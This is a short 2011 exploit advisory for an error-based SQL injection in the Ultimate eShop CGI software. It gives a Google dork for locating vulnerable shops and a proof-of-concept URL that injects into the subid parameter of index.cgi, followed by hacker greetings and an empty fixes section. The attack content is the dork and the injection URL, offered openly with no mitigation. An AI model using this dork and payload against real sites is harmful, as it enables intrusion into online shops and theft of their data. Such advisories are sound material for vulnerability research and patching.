Ultimate eShop Error Based SQL Injection Vulnerability

2011-04-20 15:15:04

# Exploit Title: Ultimate eShop Error Based SQL Injection Vulnerability
# Google Dork: inurl:index.cgi?aktion=shopview
# Date: 19/04/2011
# Author: Romka
# Software Link: http://www.ultimate-eshop.de/
# Tested on: Windows XP SP3

# Exploit:

http://localhost/index.cgi?aktion=shopview&go=artikel&topid=1&subid=1'ERROR BASED INJECTION

# Greetings:

CliC, pyro, r0bnet, Haukez, Dexter and Cyberpunkz

Fixes

No fixes

In order to submit a new fix you need to be registered.